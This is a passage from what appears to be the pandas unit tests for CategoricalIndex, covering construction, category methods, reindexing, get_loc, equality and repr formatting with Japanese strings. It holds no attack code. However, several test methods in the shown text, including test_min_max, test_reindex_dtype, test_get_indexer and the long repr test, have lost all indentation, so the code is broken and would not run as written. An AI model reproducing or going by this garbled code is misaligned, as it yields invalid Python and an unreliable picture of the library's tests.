        # narrowing the categories recodes; 'c' falls out -> code -1
        result = CategoricalIndex(ci, categories=list('ab'))
        tm.assert_index_equal(result.categories, Index(list('ab')))
        tm.assert_numpy_array_equal(result.codes,
                                    np.array([0, 0, 1,
                                              1, -1, 0], dtype='int8'))
        assert not result.ordered
        result = CategoricalIndex(ci, categories=list('ab'), ordered=True)
        tm.assert_index_equal(result.categories, Index(list('ab')))
        tm.assert_numpy_array_equal(result.codes,
                                    np.array([0, 0, 1,
                                              1, -1, 0], dtype='int8'))
        assert result.ordered
        result = pd.CategoricalIndex(ci, categories=list('ab'), ordered=True)
        expected = pd.CategoricalIndex(ci, categories=list('ab'), ordered=True,
                                       dtype='category')
        tm.assert_index_equal(result, expected, exact=True)
        # turn me to an Index
        result = Index(np.array(ci))
        assert isinstance(result, Index)
        assert not isinstance(result, CategoricalIndex)
    def test_construction_with_dtype(self):
        """dtype='category' in the Index constructor produces a
        CategoricalIndex, from ndarray, list, or range input."""
        ci = self.create_index(categories=list('abc'))
        result = Index(np.array(ci), dtype='category')
        tm.assert_index_equal(result, ci, exact=True)
        result = Index(np.array(ci).tolist(), dtype='category')
        tm.assert_index_equal(result, ci, exact=True)
        # these are generally only equal when the categories are reordered
        ci = self.create_index()
        result = Index(
            np.array(ci), dtype='category').reorder_categories(ci.categories)
        tm.assert_index_equal(result, ci, exact=True)
        # make sure indexes are handled
        expected = CategoricalIndex([0, 1, 2], categories=[0, 1, 2],
                                    ordered=True)
        idx = Index(range(3))
        result = CategoricalIndex(idx, categories=idx, ordered=True)
        tm.assert_index_equal(result, expected, exact=True)
    def test_construction_with_categorical_dtype(self):
        """A CategoricalDtype fully specifies categories/ordered; passing it
        together with explicit categories= or ordered= is an error."""
        data, cats, ordered = 'a a b b'.split(), 'c b a'.split(), True
        dtype = CategoricalDtype(categories=cats, ordered=ordered)
        result = pd.CategoricalIndex(data, dtype=dtype)
        expected = pd.CategoricalIndex(data, categories=cats,
                                       ordered=ordered)
        tm.assert_index_equal(result, expected, exact=True)
        # error to combine dtype with categories/ordered
        with pytest.raises(ValueError, match="Cannot specify both `dtype` and "
                                             "`categories` or `ordered`."):
            pd.CategoricalIndex(data, categories=cats, dtype=dtype)
        with pytest.raises(ValueError, match="Cannot specify both `dtype` and "
                                             "`categories` or `ordered`."):
            pd.CategoricalIndex(data, ordered=ordered, dtype=dtype)
def test_create_categorical(self):
# instances of CategoricalIndex, but we still want to test the code
ci = CategoricalIndex(['a', 'b', 'c'])
# First ci is self, second ci is data.
result = CategoricalIndex._create_categorical(ci, ci)
expected = Categorical(['a', 'b', 'c'])
tm.assert_categorical_equal(result, expected)
    def test_disallow_set_ops(self):
        """GH 10039: + and - raise TypeError on categorical-backed indexes,
        in either operand position."""
        # set ops (+/-) raise TypeError
        idx = pd.Index(pd.Categorical(['a', 'b']))
        pytest.raises(TypeError, lambda: idx - idx)
        pytest.raises(TypeError, lambda: idx + idx)
        pytest.raises(TypeError, lambda: idx - ['a', 'b'])
        pytest.raises(TypeError, lambda: idx + ['a', 'b'])
        pytest.raises(TypeError, lambda: ['a', 'b'] - idx)
        pytest.raises(TypeError, lambda: ['a', 'b'] + idx)
    def test_method_delegation(self):
        """Category-management methods (set/rename/add/remove categories,
        as_ordered/as_unordered) are delegated to the underlying Categorical
        and return a new CategoricalIndex; inplace=True is rejected."""
        ci = CategoricalIndex(list('aabbca'), categories=list('cabdef'))
        result = ci.set_categories(list('cab'))
        tm.assert_index_equal(result, CategoricalIndex(
            list('aabbca'), categories=list('cab')))
        ci = CategoricalIndex(list('aabbca'), categories=list('cab'))
        result = ci.rename_categories(list('efg'))
        tm.assert_index_equal(result, CategoricalIndex(
            list('ffggef'), categories=list('efg')))
        # GH18862 (let rename_categories take callables)
        result = ci.rename_categories(lambda x: x.upper())
        tm.assert_index_equal(result, CategoricalIndex(
            list('AABBCA'), categories=list('CAB')))
        ci = CategoricalIndex(list('aabbca'), categories=list('cab'))
        result = ci.add_categories(['d'])
        tm.assert_index_equal(result, CategoricalIndex(
            list('aabbca'), categories=list('cabd')))
        ci = CategoricalIndex(list('aabbca'), categories=list('cab'))
        result = ci.remove_categories(['c'])
        tm.assert_index_equal(result, CategoricalIndex(
            list('aabb') + [np.nan] + ['a'], categories=list('ab')))
        ci = CategoricalIndex(list('aabbca'), categories=list('cabdef'))
        result = ci.as_unordered()
        tm.assert_index_equal(result, ci)
        ci = CategoricalIndex(list('aabbca'), categories=list('cabdef'))
        result = ci.as_ordered()
        tm.assert_index_equal(result, CategoricalIndex(
            list('aabbca'), categories=list('cabdef'), ordered=True))
        # invalid
        pytest.raises(ValueError, lambda: ci.set_categories(
            list('cab'), inplace=True))
    def test_contains(self):
        """Membership tests values, not codes or unused categories; NaN is
        contained only when present in the data."""
        ci = self.create_index(categories=list('cabdef'))
        assert 'a' in ci
        assert 'z' not in ci
        # 'e' is a category but not a value in the index
        assert 'e' not in ci
        assert np.nan not in ci
        # assert codes NOT in index
        assert 0 not in ci
        assert 1 not in ci
        ci = CategoricalIndex(
            list('aabbca') + [np.nan], categories=list('cabdef'))
        assert np.nan in ci
def test_min_max(self):
ci = self.create_index(ordered=False)
pytest.raises(TypeError, lambda: ci.min())
pytest.raises(TypeError, lambda: ci.max())
ci = self.create_index(ordered=True)
assert ci.min() == 'c'
assert ci.max() == 'b'
    def test_map(self):
        """map preserves categorical dtype, ordering and name when possible;
        GH 12766: a constant mapper returns an Index (not an ndarray); a
        function, Series or dict mapper may change the categories dtype."""
        ci = pd.CategoricalIndex(list('ABABC'), categories=list('CBA'),
                                 ordered=True)
        result = ci.map(lambda x: x.lower())
        exp = pd.CategoricalIndex(list('ababc'), categories=list('cba'),
                                  ordered=True)
        tm.assert_index_equal(result, exp)
        ci = pd.CategoricalIndex(list('ABABC'), categories=list('BAC'),
                                 ordered=False, name='XXX')
        result = ci.map(lambda x: x.lower())
        exp = pd.CategoricalIndex(list('ababc'), categories=list('bac'),
                                  ordered=False, name='XXX')
        tm.assert_index_equal(result, exp)
        # GH 12766: Return an index not an array
        tm.assert_index_equal(ci.map(lambda x: 1),
                              Index(np.array([1] * 5, dtype=np.int64),
                                    name='XXX'))
        # change categories dtype
        ci = pd.CategoricalIndex(list('ABABC'), categories=list('BAC'),
                                 ordered=False)
        def f(x):
            # letter -> number lookup used as the mapping function
            return {'A': 10, 'B': 20, 'C': 30}.get(x)
        result = ci.map(f)
        exp = pd.CategoricalIndex([10, 20, 10, 20, 30],
                                  categories=[20, 10, 30],
                                  ordered=False)
        tm.assert_index_equal(result, exp)
        result = ci.map(pd.Series([10, 20, 30], index=['A', 'B', 'C']))
        tm.assert_index_equal(result, exp)
        result = ci.map({'A': 10, 'B': 20, 'C': 30})
        tm.assert_index_equal(result, exp)
    def test_map_with_categorical_series(self):
        """Mapping through a categorical Series keeps the categorical result
        type; a plain Series yields a plain Index (missing labels -> NaN)."""
        # GH 12756
        a = pd.Index([1, 2, 3, 4])
        b = pd.Series(["even", "odd", "even", "odd"],
                      dtype="category")
        c = pd.Series(["even", "odd", "even", "odd"])
        exp = CategoricalIndex(["odd", "even", "odd", np.nan])
        tm.assert_index_equal(a.map(b), exp)
        exp = pd.Index(["odd", "even", "odd", np.nan])
        tm.assert_index_equal(a.map(c), exp)
    @pytest.mark.parametrize('klass', [list, tuple, np.array, pd.Series])
    def test_where(self, klass):
        """where() accepts any listlike condition; False positions become
        NaN while the original categories are preserved."""
        i = self.create_index()
        # all-True condition: index comes back unchanged
        cond = [True] * len(i)
        expected = i
        result = i.where(klass(cond))
        tm.assert_index_equal(result, expected)
        # first position False -> replaced by NaN, categories kept
        cond = [False] + [True] * (len(i) - 1)
        expected = CategoricalIndex([np.nan] + i[1:].tolist(),
                                    categories=i.categories)
        result = i.where(klass(cond))
        tm.assert_index_equal(result, expected)
    def test_append(self):
        """Appending CategoricalIndexes: identical categories
        concatenate, mismatched or reordered categories raise, and a
        non-categorical base coerces the result to object (GH14298)."""
        ci = self.create_index()
        categories = ci.categories
        # append cats with the same categories
        result = ci[:3].append(ci[3:])
        tm.assert_index_equal(result, ci, exact=True)
        foos = [ci[:1], ci[1:3], ci[3:]]
        result = foos[0].append(foos[1:])
        tm.assert_index_equal(result, ci, exact=True)
        # appending an empty list is a no-op
        result = ci.append([])
        tm.assert_index_equal(result, ci, exact=True)
        # appending with different or reordered categories is not ok
        pytest.raises(
            TypeError,
            lambda: ci.append(ci.values.set_categories(list('abcd'))))
        pytest.raises(
            TypeError,
            lambda: ci.append(ci.values.reorder_categories(list('abc'))))
        # with objects: plain-Index values inside the categories work
        result = ci.append(Index(['c', 'a']))
        expected = CategoricalIndex(list('aabbcaca'), categories=categories)
        tm.assert_index_equal(result, expected, exact=True)
        # invalid objects: 'd' is not one of the categories
        pytest.raises(TypeError, lambda: ci.append(Index(['a', 'd'])))
        # GH14298 - if base object is not categorical -> coerce to object
        result = Index(['c', 'a']).append(ci)
        expected = Index(list('caaabbca'))
        tm.assert_index_equal(result, expected, exact=True)
    def test_insert(self):
        """insert() accepts existing categories and NA-likes, rejects
        values outside the categories (GH 18295 for the NA cases)."""
        ci = self.create_index()
        categories = ci.categories
        # test 0th element
        result = ci.insert(0, 'a')
        expected = CategoricalIndex(list('aaabbca'), categories=categories)
        tm.assert_index_equal(result, expected, exact=True)
        # test Nth element that follows Python list behavior
        result = ci.insert(-1, 'a')
        expected = CategoricalIndex(list('aabbcaa'), categories=categories)
        tm.assert_index_equal(result, expected, exact=True)
        # test empty
        result = CategoricalIndex(categories=categories).insert(0, 'a')
        expected = CategoricalIndex(['a'], categories=categories)
        tm.assert_index_equal(result, expected, exact=True)
        # invalid: 'd' is not among the categories
        pytest.raises(TypeError, lambda: ci.insert(0, 'd'))
        # GH 18295 (test missing): every NA-like inserts as np.nan
        expected = CategoricalIndex(['a', np.nan, 'a', 'b', 'c', 'b'])
        for na in (np.nan, pd.NaT, None):
            result = CategoricalIndex(list('aabcb')).insert(1, na)
            tm.assert_index_equal(result, expected)
    def test_delete(self):
        """delete() removes by (possibly negative) position and raises
        on an out-of-bounds index."""
        ci = self.create_index()
        categories = ci.categories
        result = ci.delete(0)
        expected = CategoricalIndex(list('abbca'), categories=categories)
        tm.assert_index_equal(result, expected, exact=True)
        result = ci.delete(-1)
        expected = CategoricalIndex(list('aabbc'), categories=categories)
        tm.assert_index_equal(result, expected, exact=True)
        with pytest.raises((IndexError, ValueError)):
            # Either exception type depending on the NumPy version
            ci.delete(10)
    def test_astype(self):
        """astype(object) keeps the values equal but drops the
        CategoricalIndex class; interval categories cast back to an
        IntervalIndex."""
        ci = self.create_index()
        result = ci.astype(object)
        tm.assert_index_equal(result, Index(np.array(ci)))
        # this IS equal, but not the same class
        assert result.equals(ci)
        assert isinstance(result, Index)
        assert not isinstance(result, CategoricalIndex)
        # interval categories: code -1 is NaN, matching ii.take([.., -1])
        ii = IntervalIndex.from_arrays(left=[-0.001, 2.0],
                                       right=[2, 4],
                                       closed='right')
        ci = CategoricalIndex(Categorical.from_codes(
            [0, 1, -1], categories=ii, ordered=True))
        result = ci.astype('interval')
        expected = ii.take([0, 1, -1])
        tm.assert_index_equal(result, expected)
        result = IntervalIndex.from_intervals(result.values)
        tm.assert_index_equal(result, expected)
    @pytest.mark.parametrize('name', [None, 'foo'])
    @pytest.mark.parametrize('dtype_ordered', [True, False])
    @pytest.mark.parametrize('index_ordered', [True, False])
    def test_astype_category(self, name, dtype_ordered, index_ordered):
        """GH 18630: astype with a CategoricalDtype re-types the index
        (ordered flag and categories taken from the dtype), while plain
        'category' leaves it unchanged."""
        index = self.create_index(ordered=index_ordered)
        if name:
            index = index.rename(name)
        # standard categories
        dtype = CategoricalDtype(ordered=dtype_ordered)
        result = index.astype(dtype)
        expected = CategoricalIndex(index.tolist(),
                                    name=name,
                                    categories=index.categories,
                                    ordered=dtype_ordered)
        tm.assert_index_equal(result, expected)
        # non-standard categories
        dtype = CategoricalDtype(index.unique().tolist()[:-1], dtype_ordered)
        result = index.astype(dtype)
        expected = CategoricalIndex(index.tolist(), name=name, dtype=dtype)
        tm.assert_index_equal(result, expected)
        if dtype_ordered is False:
            # dtype='category' can't specify ordered, so only test once
            result = index.astype('category')
            expected = index
            tm.assert_index_equal(result, expected)
    def test_reindex_base(self):
        """get_indexer of an index against itself is the identity
        permutation, and an unknown fill method raises ValueError."""
        idx = CategoricalIndex(list("cab"), categories=list("cab"))
        expected = np.arange(len(idx), dtype=np.intp)
        actual = idx.get_indexer(idx)
        tm.assert_numpy_array_equal(expected, actual)
        with tm.assert_raises_regex(ValueError, "Invalid fill method"):
            idx.get_indexer(idx, method="invalid")
    def test_reindexing(self):
        """get_indexer on a non-unique CategoricalIndex agrees with the
        object-dtype get_indexer_non_unique result."""
        np.random.seed(123456789)
        ci = self.create_index()
        oidx = Index(np.array(ci))
        # random targets of several sizes drawn from the index itself
        for n in [1, 2, 5, len(ci)]:
            finder = oidx[np.random.randint(0, len(ci), size=n)]
            expected = oidx.get_indexer_non_unique(finder)[0]
            actual = ci.get_indexer(finder)
            tm.assert_numpy_array_equal(expected, actual)
        # fixed targets containing repeats
        for finder in [list("aabbca"), list("aababca")]:
            expected = oidx.get_indexer_non_unique(finder)[0]
            actual = ci.get_indexer(finder)
            tm.assert_numpy_array_equal(expected, actual)
def test_reindex_dtype(self):
c = CategoricalIndex(['a', 'b', 'c', 'a'])
res, indexer = c.reindex(['a', 'c'])
tm.assert_index_equal(res, Index(['a', 'a', 'c']), exact=True)
tm.assert_numpy_array_equal(indexer,
np.array([0, 3, 2], dtype=np.intp))
c = CategoricalIndex(['a', 'b', 'c', 'a'])
res, indexer = c.reindex(Categorical(['a', 'c']))
exp = CategoricalIndex(['a', 'a', 'c'], categories=['a', 'c'])
tm.assert_index_equal(res, exp, exact=True)
tm.assert_numpy_array_equal(indexer,
np.array([0, 3, 2], dtype=np.intp))
c = CategoricalIndex(['a', 'b', 'c', 'a'],
categories=['a', 'b', 'c', 'd'])
res, indexer = c.reindex(['a', 'c'])
exp = Index(['a', 'a', 'c'], dtype='object')
tm.assert_index_equal(res, exp, exact=True)
tm.assert_numpy_array_equal(indexer,
np.array([0, 3, 2], dtype=np.intp))
c = CategoricalIndex(['a', 'b', 'c', 'a'],
categories=['a', 'b', 'c', 'd'])
res, indexer = c.reindex(Categorical(['a', 'c']))
exp = CategoricalIndex(['a', 'a', 'c'], categories=['a', 'c'])
tm.assert_index_equal(res, exp, exact=True)
tm.assert_numpy_array_equal(indexer,
np.array([0, 3, 2], dtype=np.intp))
    def test_reindex_empty_index(self):
        """Reindexing an empty CategoricalIndex returns all targets with
        -1 (missing) positions."""
        c = CategoricalIndex([])
        res, indexer = c.reindex(['a', 'b'])
        tm.assert_index_equal(res, Index(['a', 'b']), exact=True)
        tm.assert_numpy_array_equal(indexer,
                                    np.array([-1, -1], dtype=np.intp))
    def test_is_monotonic(self):
        """Monotonicity is judged by the category order (the codes), not
        by the raw values."""
        c = CategoricalIndex([1, 2, 3])
        assert c.is_monotonic_increasing
        assert not c.is_monotonic_decreasing
        c = CategoricalIndex([1, 2, 3], ordered=True)
        assert c.is_monotonic_increasing
        assert not c.is_monotonic_decreasing
        # reversed categories invert the code order
        c = CategoricalIndex([1, 2, 3], categories=[3, 2, 1])
        assert not c.is_monotonic_increasing
        assert c.is_monotonic_decreasing
        c = CategoricalIndex([1, 3, 2], categories=[3, 2, 1])
        assert not c.is_monotonic_increasing
        assert not c.is_monotonic_decreasing
        c = CategoricalIndex([1, 2, 3], categories=[3, 2, 1], ordered=True)
        assert not c.is_monotonic_increasing
        assert c.is_monotonic_decreasing
        # category order [9, 0, ...] makes [9, 0] "increasing"
        categories = [9, 0, 1, 2, 3]
        c = CategoricalIndex([9, 0], categories=categories)
        assert c.is_monotonic_increasing
        assert not c.is_monotonic_decreasing
        c = CategoricalIndex([0, 1], categories=categories)
        assert c.is_monotonic_increasing
        assert not c.is_monotonic_decreasing
    def test_duplicates(self):
        """drop_duplicates and unique collapse repeated values and keep
        the index name."""
        idx = CategoricalIndex([0, 0, 0], name='foo')
        assert not idx.is_unique
        assert idx.has_duplicates
        expected = CategoricalIndex([0], name='foo')
        tm.assert_index_equal(idx.drop_duplicates(), expected)
        tm.assert_index_equal(idx.unique(), expected)
def test_get_indexer(self):
idx1 = CategoricalIndex(list('aabcde'), categories=list('edabc'))
idx2 = CategoricalIndex(list('abf'))
for indexer in [idx2, list('abf'), Index(list('abf'))]:
r1 = idx1.get_indexer(idx2)
assert_almost_equal(r1, np.array([0, 1, 2, -1], dtype=np.intp))
pytest.raises(NotImplementedError,
lambda: idx2.get_indexer(idx1, method='pad'))
pytest.raises(NotImplementedError,
lambda: idx2.get_indexer(idx1, method='backfill'))
pytest.raises(NotImplementedError,
lambda: idx2.get_indexer(idx1, method='nearest'))
    def test_get_loc(self):
        """get_loc matches plain-Index behavior: a scalar position for
        unique labels, a boolean mask for scattered duplicates, a slice
        for contiguous duplicates, KeyError for missing labels."""
        cidx1 = CategoricalIndex(list('abcde'), categories=list('edabc'))
        idx1 = Index(list('abcde'))
        assert cidx1.get_loc('a') == idx1.get_loc('a')
        assert cidx1.get_loc('e') == idx1.get_loc('e')
        for i in [cidx1, idx1]:
            with pytest.raises(KeyError):
                i.get_loc('NOT-EXIST')
        # non-unique, non-contiguous duplicates -> boolean mask
        cidx2 = CategoricalIndex(list('aacded'), categories=list('edabc'))
        idx2 = Index(list('aacded'))
        res = cidx2.get_loc('d')
        tm.assert_numpy_array_equal(res, idx2.get_loc('d'))
        tm.assert_numpy_array_equal(res, np.array([False, False, False,
                                                   True, False, True]))
        res = cidx2.get_loc('e')
        assert res == idx2.get_loc('e')
        assert res == 4
        for i in [cidx2, idx2]:
            with pytest.raises(KeyError):
                i.get_loc('NOT-EXIST')
        # non-unique, contiguous duplicates -> slice
        cidx3 = CategoricalIndex(list('aabbb'), categories=list('abc'))
        idx3 = Index(list('aabbb'))
        res = cidx3.get_loc('a')
        assert res == idx3.get_loc('a')
        assert res == slice(0, 2, None)
        res = cidx3.get_loc('b')
        assert res == idx3.get_loc('b')
        assert res == slice(2, 5, None)
        for i in [cidx3, idx3]:
            with pytest.raises(KeyError):
                i.get_loc('c')
    def test_repr_roundtrip(self):
        """eval(repr(ci)) reconstructs the index, and string formatting
        works on both small and large (truncated-repr) indexes."""
        ci = CategoricalIndex(['a', 'b'], categories=['a', 'b'], ordered=True)
        str(ci)
        tm.assert_index_equal(eval(repr(ci)), ci, exact=True)
        # formatting works for the native text type on both PY2 and PY3
        if PY3:
            str(ci)
        else:
            compat.text_type(ci)
        ci = CategoricalIndex(np.random.randint(0, 5, size=100))
        if PY3:
            str(ci)
        else:
            compat.text_type(ci)
    def test_isin(self):
        """isin matches on values (NaN only when explicitly listed) and
        follows set_categories when given a categorical target."""
        ci = CategoricalIndex(
            list('aabca') + [np.nan], categories=['c', 'a', 'b'])
        tm.assert_numpy_array_equal(
            ci.isin(['c']),
            np.array([False, False, False, True, False, False]))
        tm.assert_numpy_array_equal(
            ci.isin(['c', 'a', 'b']), np.array([True] * 5 + [False]))
        # NaN matches only when it is explicitly in the value list
        tm.assert_numpy_array_equal(
            ci.isin(['c', 'a', 'b', np.nan]), np.array([True] * 6))
        # same values under a larger category set -> all True
        result = ci.isin(ci.set_categories(list('abcdefghi')))
        expected = np.array([True] * 6)
        tm.assert_numpy_array_equal(result, expected)
        # disjoint categories -> only the NaN position matches
        result = ci.isin(ci.set_categories(list('defghi')))
        expected = np.array([False] * 5 + [True])
        tm.assert_numpy_array_equal(result, expected)
    def test_identical(self):
        """identical() requires matching categories, not merely equal
        values."""
        ci1 = CategoricalIndex(['a', 'b'], categories=['a', 'b'], ordered=True)
        ci2 = CategoricalIndex(['a', 'b'], categories=['a', 'b', 'c'],
                               ordered=True)
        assert ci1.identical(ci1)
        assert ci1.identical(ci1.copy())
        # same values, extra category 'c' -> not identical
        assert not ci1.identical(ci2)
    def test_ensure_copied_data(self):
        """gh-12309: Check the "copy" argument of each Index.__new__ is
        honored.

        Must be tested separately from other indexes because self.value
        is not an ndarray.
        """
        # resolve an ndarray to its owning base buffer, if it is a view
        _base = lambda ar: ar if ar.base is None else ar.base
        for index in self.indices.values():
            result = CategoricalIndex(index.values, copy=True)
            tm.assert_index_equal(index, result)
            # copy=True must not share the underlying buffer ...
            assert _base(index.values) is not _base(result.values)
            # ... while copy=False must share it
            result = CategoricalIndex(index.values, copy=False)
            assert _base(index.values) is _base(result.values)
    def test_equals_categorical(self):
        """equals() and the comparison operators on CategoricalIndex:
        equality tracks values (via astype(object)) but not extra
        categories; ordered-ness matters; length mismatch raises."""
        ci1 = CategoricalIndex(['a', 'b'], categories=['a', 'b'], ordered=True)
        ci2 = CategoricalIndex(['a', 'b'], categories=['a', 'b', 'c'],
                               ordered=True)
        assert ci1.equals(ci1)
        assert not ci1.equals(ci2)
        assert ci1.equals(ci1.astype(object))
        assert ci1.astype(object).equals(ci1)
        assert (ci1 == ci1).all()
        assert not (ci1 != ci1).all()
        assert not (ci1 > ci1).all()
        assert not (ci1 < ci1).all()
        assert (ci1 <= ci1).all()
        assert (ci1 >= ci1).all()
        assert not (ci1 == 1).all()
        assert (ci1 == Index(['a', 'b'])).all()
        assert (ci1 == ci1.values).all()
        # invalid comparisons
        with tm.assert_raises_regex(ValueError, "Lengths must match"):
            ci1 == Index(['a', 'b', 'c'])
        pytest.raises(TypeError, lambda: ci1 == ci2)
        pytest.raises(
            TypeError, lambda: ci1 == Categorical(ci1.values, ordered=False))
        pytest.raises(
            TypeError,
            lambda: ci1 == Categorical(ci1.values, categories=list('abc')))
        # make sure that we are testing for category inclusion properly
        ci = CategoricalIndex(list('aabca'), categories=['c', 'a', 'b'])
        assert not ci.equals(list('aabca'))
        # Same categories, but different order
        # Unordered
        assert ci.equals(CategoricalIndex(list('aabca')))
        # Ordered
        assert not ci.equals(CategoricalIndex(list('aabca'), ordered=True))
        assert ci.equals(ci.copy())
        # a NaN entry breaks equality with NaN-free indexes
        ci = CategoricalIndex(list('aabca') + [np.nan],
                              categories=['c', 'a', 'b'])
        assert not ci.equals(list('aabca'))
        assert not ci.equals(CategoricalIndex(list('aabca')))
        assert ci.equals(ci.copy())
        ci = CategoricalIndex(list('aabca') + [np.nan],
                              categories=['c', 'a', 'b'])
        assert not ci.equals(list('aabca') + [np.nan])
        assert ci.equals(CategoricalIndex(list('aabca') + [np.nan]))
        assert not ci.equals(CategoricalIndex(list('aabca') + [np.nan],
                                              ordered=True))
        assert ci.equals(ci.copy())
def test_string_categorical_index_repr(self):
# short
idx = pd.CategoricalIndex(['a', 'bb', 'ccc'])
if PY3:
expected = u"""CategoricalIndex(['a', 'bb', 'ccc'], categories=['a', 'bb', 'ccc'], ordered=False, dtype='category')""" # noqa
assert repr(idx) == expected
else:
expected = u"""CategoricalIndex([u'a', u'bb', u'ccc'], categories=[u'a', u'bb', u'ccc'], ordered=False, dtype='category')""" # noqa
assert unicode(idx) == expected
# multiple lines
idx = pd.CategoricalIndex(['a', 'bb', 'ccc'] * 10)
if PY3:
expected = u"""CategoricalIndex(['a', 'bb', 'ccc', 'a', 'bb', 'ccc', 'a', 'bb', 'ccc', 'a',
'bb', 'ccc', 'a', 'bb', 'ccc', 'a', 'bb', 'ccc', 'a', 'bb',
'ccc', 'a', 'bb', 'ccc', 'a', 'bb', 'ccc', 'a', 'bb', 'ccc'],
categories=['a', 'bb', 'ccc'], ordered=False, dtype='category')""" # noqa
assert repr(idx) == expected
else:
expected = u"""CategoricalIndex([u'a', u'bb', u'ccc', u'a', u'bb', u'ccc', u'a', u'bb',
u'ccc', u'a', u'bb', u'ccc', u'a', u'bb', u'ccc', u'a',
u'bb', u'ccc', u'a', u'bb', u'ccc', u'a', u'bb', u'ccc',
u'a', u'bb', u'ccc', u'a', u'bb', u'ccc'],
categories=[u'a', u'bb', u'ccc'], ordered=False, dtype='category')""" # noqa
assert unicode(idx) == expected
# truncated
idx = pd.CategoricalIndex(['a', 'bb', 'ccc'] * 100)
if PY3:
expected = u"""CategoricalIndex(['a', 'bb', 'ccc', 'a', 'bb', 'ccc', 'a', 'bb', 'ccc', 'a',
...
'ccc', 'a', 'bb', 'ccc', 'a', 'bb', 'ccc', 'a', 'bb', 'ccc'],
categories=['a', 'bb', 'ccc'], ordered=False, dtype='category', length=300)""" # noqa
assert repr(idx) == expected
else:
expected = u"""CategoricalIndex([u'a', u'bb', u'ccc', u'a', u'bb', u'ccc', u'a', u'bb',
u'ccc', u'a',
...
u'ccc', u'a', u'bb', u'ccc', u'a', u'bb', u'ccc', u'a',
u'bb', u'ccc'],
categories=[u'a', u'bb', u'ccc'], ordered=False, dtype='category', length=300)""" # noqa
assert unicode(idx) == expected
# larger categories
idx = pd.CategoricalIndex(list('abcdefghijklmmo'))
if PY3:
expected = u"""CategoricalIndex(['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l',
'm', 'm', 'o'],
categories=['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', ...], ordered=False, dtype='category')""" # noqa
assert repr(idx) == expected
else:
expected = u"""CategoricalIndex([u'a', u'b', u'c', u'd', u'e', u'f', u'g', u'h', u'i', u'j',
u'k', u'l', u'm', u'm', u'o'],
categories=[u'a', u'b', u'c', u'd', u'e', u'f', u'g', u'h', ...], ordered=False, dtype='category')""" # noqa
assert unicode(idx) == expected
# short
idx = pd.CategoricalIndex([u'あ', u'いい', u'ううう'])
if PY3:
expected = u"""CategoricalIndex(['あ', 'いい', 'ううう'], categories=['あ', 'いい', 'ううう'], ordered=False, dtype='category')""" # noqa
assert repr(idx) == expected
else:
expected = u"""CategoricalIndex([u'あ', u'いい', u'ううう'], categories=[u'あ', u'いい', u'ううう'], ordered=False, dtype='category')""" # noqa
assert unicode(idx) == expected
# multiple lines
idx = pd.CategoricalIndex([u'あ', u'いい', u'ううう'] * 10)
if PY3:
expected = u"""CategoricalIndex(['あ', 'いい', 'ううう', 'あ', 'いい', 'ううう', 'あ', 'いい', 'ううう', 'あ',
'いい', 'ううう', 'あ', 'いい', 'ううう', 'あ', 'いい', 'ううう', 'あ', 'いい',
'ううう', 'あ', 'いい', 'ううう', 'あ', 'いい', 'ううう', 'あ', 'いい', 'ううう'],
categories=['あ', 'いい', 'ううう'], ordered=False, dtype='category')""" # noqa
assert repr(idx) == expected
else:
expected = u"""CategoricalIndex([u'あ', u'いい', u'ううう', u'あ', u'いい', u'ううう', u'あ', u'いい',
u'ううう', u'あ', u'いい', u'ううう', u'あ', u'いい', u'ううう', u'あ',
u'いい', u'ううう', u'あ', u'いい', u'ううう', u'あ', u'いい', u'ううう',
u'あ', u'いい', u'ううう', u'あ', u'いい', u'ううう'],
categories=[u'あ', u'いい', u'ううう'], ordered=False, dtype='category')""" # noqa
assert unicode(idx) == expected
# truncated
idx = pd.CategoricalIndex([u'あ', u'いい', u'ううう'] * 100)
if PY3:
expected = u"""CategoricalIndex(['あ', 'いい', 'ううう', 'あ', 'いい', 'ううう', 'あ', 'いい', 'ううう', 'あ',
...
'ううう', 'あ', 'いい', 'ううう', 'あ', 'いい', 'ううう', 'あ', 'いい', 'ううう'],
categories=['あ', 'いい', 'ううう'], ordered=False, dtype='category', length=300)""" # noqa
assert repr(idx) == expected
else:
expected = u"""CategoricalIndex([u'あ', u'いい', u'ううう', u'あ', u'いい', u'ううう', u'あ', u'いい',
u'ううう', u'あ',
...
u'ううう', u'あ', u'いい', u'ううう', u'あ', u'いい', u'ううう', u'あ',
u'いい', u'ううう'],
categories=[u'あ', u'いい', u'ううう'], ordered=False, dtype='category', length=300)""" # noqa
assert unicode(idx) == expected
# larger categories
idx = pd.CategoricalIndex(list(u'あいうえおかきくけこさしすせそ'))
if PY3:
expected = u"""CategoricalIndex(['あ', 'い', 'う', 'え', 'お', 'か', 'き', 'く', 'け', 'こ', 'さ', 'し',
'す', 'せ', 'そ'],
categories=['あ', 'い', 'う', 'え', 'お', 'か', 'き', 'く', ...], ordered=False, dtype='category')""" # noqa
assert repr(idx) == expected
else:
expected = u"""CategoricalIndex([u'あ', u'い', u'う', u'え', u'お', u'か', u'き', u'く', u'け', u'こ',
u'さ', u'し', u'す', u'せ', u'そ'],
categories=[u'あ', u'い', u'う', u'え', u'お', u'か', u'き', u'く', ...], ordered=False, dtype='category')""" # noqa
assert unicode(idx) == expected
# Emable Unicode option -----------------------------------------
with cf.option_context('display.unicode.east_asian_width', True):
# short
idx = pd.CategoricalIndex([u'あ', u'いい', u'ううう'])
if PY3:
expected = u"""CategoricalIndex(['あ', 'いい', 'ううう'], categories=['あ', 'いい', 'ううう'], ordered=False, dtype='category')""" # noqa
assert repr(idx) == expected
else:
expected = u"""CategoricalIndex([u'あ', u'いい', u'ううう'], categories=[u'あ', u'いい', u'ううう'], ordered=False, dtype='category')""" # noqa
assert unicode(idx) == expected
# multiple lines
idx = pd.CategoricalIndex([u'あ', u'いい', u'ううう'] * 10)
if PY3:
expected = u"""CategoricalIndex(['あ', 'いい', 'ううう', 'あ', 'いい', 'ううう', 'あ', 'いい',
'ううう', 'あ', 'いい', 'ううう', 'あ', 'いい', 'ううう',
'あ', 'いい', 'ううう', 'あ', 'いい', 'ううう', 'あ', 'いい',
'ううう', 'あ', 'いい', 'ううう', 'あ', 'いい', 'ううう'],
categories=['あ', 'いい', 'ううう'], ordered=False, dtype='category')""" # noqa
assert repr(idx) == expected
else:
expected = u"""CategoricalIndex([u'あ', u'いい', u'ううう', u'あ', u'いい', u'ううう', u'あ',
u'いい', u'ううう', u'あ', u'いい', u'ううう', u'あ',
u'いい', u'ううう', u'あ', u'いい', u'ううう', u'あ',
